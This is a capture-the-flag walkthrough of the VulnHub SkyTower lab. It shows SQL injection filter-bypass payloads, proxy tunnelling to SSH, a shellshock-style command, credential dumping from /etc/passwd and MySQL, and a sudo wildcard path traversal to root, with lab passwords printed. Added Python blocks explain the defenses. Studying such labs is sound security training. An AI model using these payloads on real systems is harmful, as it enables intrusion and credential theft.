VulnHub: SkyTower: 1

6 min read · Apr 26, 2021


Initial foothold

1. Network discovery

nmap -sn

My target is

2. Port scan

nmap -Pn -p1000-

There’s 1 filtered port (22) and 2 open ports (80 and 3128).

3. OS and service scan

nmap -A -p22,80,3128

4. Vuln scan

nmap --script vuln -p22,80,3128

There’s ‘login.php’ on the HTTP service.

Service Enumeration

There are 3 services:

• 22/tcp filtered ssh

1. Connect

When I tried to connect, it froze.

• 80/tcp open http Apache httpd 2.2.22 ((Debian))

1. Nikto scan

2. Directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi,bak -q

3. Access HTTP site

View page source

4. SQL injection

Since it's a login form, I will try SQL injection.


Intercept w/ Burp Suite

Send to the Repeater.

Starting w/ this input:

1' or 1=1--

Use decoder to encode for URL

Copy it to both the email and password parameters. There's an error message.

Take a closer look

There are 2 problems that I'm facing:

1. Filter

In my experience, error-based SQLi will show a message like this:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 

In this case, it’s a weird error message, ‘11’.
Because of this, I suspect that there’s a filter in the code.

2. Comment

I supplied '--' as a comment to suppress the password field, but the error message still shows that there's some handling of the password field. I need to change it.

To bypass the filter problem, I changed ‘or’ to ‘||’

1' || 1=1--

Taking a closer look at the error message, the filter problem is gone for now.

1' || 1=1-- -  -> failed
1' || 1=1--+   -> failed
1' || 1=1#     -> succeeded

I got a credential, john : hereisjohn.
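The two login checks below are an added example, not code from the SkyTower VM or this post, written to show why the form fell to the first probe above and what removes the problem. The string-built query lets the `'` and `--` in the input rewrite the `WHERE` clause, so the password check disappears; the parameterized query binds the same input as a value and matches nothing. It uses an in-memory SQLite table with a constructed row (the email address is made up; only the password comes from the walkthrough). SQLite is used instead of MySQL so the block runs offline; note that in SQLite `||` is string concatenation rather than logical OR and `#` is not a comment, so the later payloads are deliberately not reproduced here.

```python
"""String-built login query beside a parameterized one (added example)."""
import sqlite3

# Constructed sample data, not the VM's real table: one user row.
SAMPLE_USERS = [("john@example.com", "hereisjohn")]

# The walkthrough's first probe: the quote closes the literal and '--' comments
# out everything after it, including the password comparison.
PAYLOAD = "1' or 1=1--"


def make_db():
    """In-memory SQLite database standing in for the SkyTech.login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, email, password):
    """Concatenates user input into SQL. Returns the matched email, or None."""
    query = (
        "SELECT email FROM login WHERE email='" + email
        + "' AND password='" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def hardened_login(conn, email, password):
    """Binds user input as parameters, so it is data and never parsed as SQL."""
    row = conn.execute(
        "SELECT email FROM login WHERE email=? AND password=?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run both checks with a real credential and with the probe in both fields."""
    conn = make_db()
    return {
        "legit": hardened_login(conn, "john@example.com", "hereisjohn"),
        "vulnerable_with_payload": vulnerable_login(conn, PAYLOAD, PAYLOAD),
        "hardened_with_payload": hardened_login(conn, PAYLOAD, PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The hardened version needs no keyword filter at all: a blocklist of `or`, `=` or `--` only changes which characters the attacker has to avoid, which is exactly what the `||` and `#` variants above exploit, whereas a bound parameter is never interpreted by the SQL parser.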

• 3128/tcp open http-proxy Squid http proxy 3.1.20

Access w/ browser. It’s a proxy service.


Only the SSH service and the proxy service are left. I will try to create a proxy tunnel and access SSH through it.

1. To create the proxy tunnel, use this command:

proxytunnel -p <target ip>:<proxy port> -d <target ip>:<target port> -a <our port>

proxytunnel -p -d -a 1234

2. Connect to SSH

ssh john@ -p 1234

I could connect, but the connection was cut immediately.
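From the defender's side, the tunnel above only works because Squid is willing to `CONNECT` to port 22; the stock squid.conf denies `CONNECT` to anything outside `SSL_ports` with `http_access deny CONNECT !SSL_ports`. The script below is an added example, not part of this post or of Squid, that finds such tunnels in Squid's native access.log format (timestamp, elapsed ms, client, status/code, bytes, method, URL, ident, hierarchy, type). The four log lines are constructed, with made-up RFC 1918 addresses rather than the VM's, and the allow-list is assumed to be just 443.

```python
"""Flag CONNECT requests through a Squid proxy to non-TLS ports (added example)."""
from collections import namedtuple

Tunnel = namedtuple("Tunnel", "ts client dest_host dest_port allowed")

# Constructed sample lines in Squid's native access.log format (not from the VM).
SAMPLE_LOG = """\
1619426400.101    152 10.0.0.5 TCP_TUNNEL/200 3188 CONNECT 10.0.0.20:22 - HIER_DIRECT/10.0.0.20 -
1619426401.222     48 10.0.0.5 TCP_MISS/200 1024 GET http://10.0.0.20/login.php - HIER_DIRECT/10.0.0.20 text/html
1619426402.333    900 10.0.0.6 TCP_TUNNEL/200 22000 CONNECT www.example.com:443 - HIER_DIRECT/93.184.216.34 -
1619426403.444     10 10.0.0.7 TCP_DENIED/403 3500 CONNECT 10.0.0.20:22 - HIER_NONE/- text/html
"""

# Assumed allow-list: Squid's default SSL_ports is only 443.
ALLOWED_CONNECT_PORTS = {443}


def parse_connects(text):
    """Yield one Tunnel per CONNECT request in native-format access.log text.

    Only host:port destinations are handled; bracketed IPv6 literals would need
    extra parsing and are out of scope for this example.
    """
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[5] != "CONNECT":
            continue
        host, _, port = fields[6].rpartition(":")
        yield Tunnel(
            ts=float(fields[0]),
            client=fields[2],
            dest_host=host,
            dest_port=int(port) if port.isdigit() else None,
            # TCP_TUNNEL means the proxy actually relayed the connection;
            # TCP_DENIED means the ACLs stopped it but the attempt is still worth seeing.
            allowed=fields[3].startswith("TCP_TUNNEL"),
        )


def suspicious_tunnels(text, allowed_ports=ALLOWED_CONNECT_PORTS):
    """CONNECT requests to ports outside the allow-list, e.g. SSH over the proxy."""
    return [t for t in parse_connects(text) if t.dest_port not in allowed_ports]


if __name__ == "__main__":
    for hit in suspicious_tunnels(SAMPLE_LOG):
        state = "RELAYED" if hit.allowed else "denied"
        print(f"{hit.ts:.0f} {hit.client} -> {hit.dest_host}:{hit.dest_port} {state}")
```

A relayed hit to port 22 is the tunnel this walkthrough builds; a denied hit shows the ACL doing its job but still records who tried, which is the line worth alerting on.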

3. Working around SSH to get the shell

• SSH shellshock

ssh john@ -p 1234 '() { :;}; /bin/bash'

• Just call /bin/bash

ssh john@ -p 1234 /bin/bash
id

4. TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

This machine doesn't have python.

Try for another one, echo.

which echo
echo os.system('/bin/bash')

My connection was cut again. I'm tired of this, so I have to work around it.

My first suspicion is ‘.bashrc’.

ls -la

There’s the ‘.bashrc’ file.

Edit it

nano .bashrc

I cannot edit it.

Read it

cat .bashrc

There’s an ‘exit’ command in the file.

Just remove it

rm .bashrc

Login again. This time, I don't have to call /bin/bash.

ssh john@ -p 1234

I’m good to go.

Privilege Escalation

1. Verify users

cat /etc/passwd

There are 3 users on this machine: john, sara, and william.

2. Explore directories

I explored as listed


Finally, I found 'login.php' in /var/www/html. Here are the commands:

cd /var/www/html
ls -la
cat login.php

I got the MySQL credentials.

3. Verify sudo

sudo -l

John cannot run any sudo commands.

4. Access mysql

Verify version

mysql -V

Login to mysql

mysql -uroot -proot

List database

use mysql;
show databases;

There’s SkyTech.

Show tables in SkyTech

use SkyTech;
show tables;

There’s login table.

Retrieve data

select * from login;

I got the other 2 users’ credentials, sara and william.

5. Login as sara

su sara

The connection was cut immediately like john’s shell.

Remove .bashrc

ssh sara@ -p 1234 /bin/bash
rm .bashrc

Login again

ssh sara@ -p 1234

6. sara’s sudo

Verify sudo

sudo -l

This user can run /bin/cat /accounts/* with sudo.

Verify path

ls -la /

There’s /accounts directory.

Use the wildcard to traverse out to /root

sudo /bin/cat /accounts/../root/flag.txt

Now I got the root password.
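Why the `..` trick above works is a property of how sudoers matches wildcards in command arguments: the sudoers manual states that a wildcard in a command-line argument does match `/`, and nothing canonicalizes the path before matching, so `/accounts/../root/flag.txt` satisfies `/accounts/*`. The block below is an added example, not from this post or from sudo, that reproduces that glob behaviour with Python's `fnmatch` next to the check a custom wrapper should perform instead: normalize the path and require it to stay under the intended directory. The rule pattern and the directory come from the walkthrough; the helper names are my own.

```python
"""Sudoers-style wildcard matching beside a canonical-path check (added example)."""
import fnmatch
import posixpath

ALLOWED_ROOT = "/accounts"           # the directory the rule meant to expose
SUDOERS_ARG_PATTERN = "/accounts/*"  # the wildcard argument shown by `sudo -l`


def sudoers_style_match(arg):
    """Plain glob match, as a wildcard in a sudoers command argument behaves:
    '*' also matches '/', and '..' segments are not canonicalized."""
    return fnmatch.fnmatchcase(arg, SUDOERS_ARG_PATTERN)


def canonical_path_allowed(arg):
    """Hardened check: resolve '.' and '..' first, then require the result to stay
    under ALLOWED_ROOT. posixpath is used so the result is the same on any host;
    a real wrapper would also resolve symlinks with os.path.realpath."""
    resolved = posixpath.normpath(posixpath.join("/", arg))
    return posixpath.commonpath([ALLOWED_ROOT, resolved]) == ALLOWED_ROOT


def evaluate(arg):
    """Compare both decisions for one requested path."""
    return {
        "glob_match": sudoers_style_match(arg),
        "canonical_ok": canonical_path_allowed(arg),
    }


if __name__ == "__main__":
    for path in ("/accounts/sara.txt", "/accounts/../root/flag.txt", "/root/flag.txt"):
        print(path, evaluate(path))
```

The practical fix on the sudoers side is to drop the wildcard and list the exact files, or to grant a small wrapper script that performs the canonical check above; a `*` in an argument position should be treated as "any string", not "any file in this directory".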

Login as root

su -
password: theskytower